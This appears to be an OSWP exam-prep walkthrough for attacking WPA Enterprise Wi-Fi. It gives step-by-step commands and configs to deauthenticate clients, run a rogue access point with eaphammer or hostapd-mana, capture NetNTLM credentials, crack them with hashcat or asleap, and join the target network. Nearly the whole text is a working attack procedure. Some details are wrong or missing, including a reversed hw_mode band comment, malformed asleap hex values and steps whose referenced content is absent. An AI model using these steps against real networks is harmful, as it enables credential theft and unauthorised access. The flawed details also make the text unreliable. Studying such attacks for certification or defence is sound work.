# WPA Enterpise (WPA-MGT)
## 1. Finding WPA-MGT networks
You can find these on the 2.4ghz and 5ghz signals:
```
# dump 2.4ghz
sudo airodump-ng wlan0mon
# dump 5ghz
sudo airodump-ng -b a wlan0mon
```
In the "auth" column of airodump-ng, check for "MGT".
## 2. Finding the certificate information
To attack WPA Enterprise we build build our own rogue AP, but to do so, we need to create a certificate. We need to make the certificate with the same information as our target. To capture the information, we need to capture a handshake like in WPA2 attacks.
Use airodump-ng to capture the handshake:
```
sudo airodump-ng wlan0mon --bssid F0:9F:C2:71:22:15 -c 44 -w wpamgt
```
Do a deauth attack:
```
sudo aireplay-ng -0 5 -c 64:32:A8:07:6C:40 -a F0:9F:C2:71:22:15 wlan0mon
```
If successful, you will see "WPA handshake: X"
Open the wpamgt.cap file with WireShark and set the filter to tls.handshake.certificate:
Now extract the certificate with:
Save it as "cert.der" and extract the info using:
```
openssl x509 -inform der -in cert.der -text
```
The info we need:
## 3. Setting up Rogue AP
To attack a mistrusted client on an MGT network we have to create a RogueAP with the same ESSID and configuration but with a self-signed certificate, preferably with the same data as the real one in case the client manually verifies the certificate. To do this you can use “eaphammer”.
{% hint style="danger" %}
eaphammer is **not** allowed on the OSWP exam, instead use **freeradius** with hostapd-mana.
{% endhint %}
```
python3 ./eaphammer --cert-wizard
```
When this is completed, setup hostapd-mana with:
```
python3 ./eaphammer -i wlan3 --auth wpa-eap --essid wifi-corp --creds --negotiate balanced
```
### 3.1 Using freeradius with hostapd-mana
First of all, install freeradius
```
sudo apt-get install freeradius
```
Go to /etc/freeradius/3/certs and open ca.cnf and server.cnf
Modify the underneath values to the obtained information from the certificate:
After that we do the following commands under `/etc/freeradius/3.0/certs` to generate `Diffie Hellman key` for `hostapd-mana`
```
rm dh
make
```
Next, create a file called `mana.eap_user`
```
* PEAP,TTLS,TLS,FAST
"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "pass" [2]
```
After that we create a fake access point by creating a file called `network.conf` under any other directory:
```tsconfig
ssid=
interface=
driver=nl80211
channel=
hw_mode=a # use 'g' for 5ghz networks
ieee8021x=1
eap_server=1
eapol_key_index_workaround=0
eap_user_file=/etc/hostapd-mana/mana.eap_user
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key
private_key_passwd=whatever
dh_file=/etc/freeradius/3.0/certs/dh
auth_algs=1
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP TKIP
mana_wpe=1
mana_credout=/tmp/hostapd.credoutfile
mana_eapsuccess=1
mana_eaptls=1
```
Make sure to point the mana.easp\_user file to the right directory. Use hostapd-mana to setup the fake AP:
```
sudo hostapd-mana network.conf
```
## 4. Broadcast deauth to all AP's
With “airodump-ng” we detect the MAC of the clients to perform a deauthentication attack. So we do this attack on both clients in parallel. As there are 2 APs we have to perform the attack against the 2 APs, since disconnecting from 1 may connect to the other instead of to our RogueAP..
{% hint style="info" %}
Delete `-c` option if you want to do it in broadcast (Kick all clients)\
You need to use another interface in monitor mode, Also you need to set the interface to the same channel as the target network before performing the De-authenticate attack, As the following:
{% endhint %}
```
sudo iwconfig wlan0mon channel 44
```
Next we sent a broadcast deauth to both AP's while our rogue AP is listening:
aireplay-ng -0 0 -a F0:9F:C2:71:22:1A wlan0mon
aireplay-ng -0 0 -a F0:9F:C2:71:22:15 wlan0mon
If succesful we receive a NETNTLM hash:
## 5. Crack the hash
```
hashcat -a 0 -m 5500 juan.tr::::673256730e43f7a67c712534e0970f86160487ce60e560bc:009f9888b8c646ec /root/rockyou-top100000.txt --force
```
### 5.1 Use asleap
If you cannot use hashcat you can use asleap to get the password instead:
```bash
asleap -C do:3b:8d:7b:22:00:0:91 -R 68:09:13:ac:e8:df:36:5f:42:94:fb:97:91:05:2:21:72:ff:b3:ce:c0:ca:26:f7 -W /usr/share/john/password.lst
```
## 6. Connect to network
Create a hostapd mana config:
```tsconfig
network={
ssid="NetworkName"
scan_ssid=1
key_mgmt=WPA-EAP
identity="Domain\username"
password="password"
eap=PEAP
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}
```
Connect:
```
wpa_supplicant -c network.conf -i
```
Get IP:
```sh
sudo dhclient wlan3
ip addr show wlan3
```
## 7. Sources
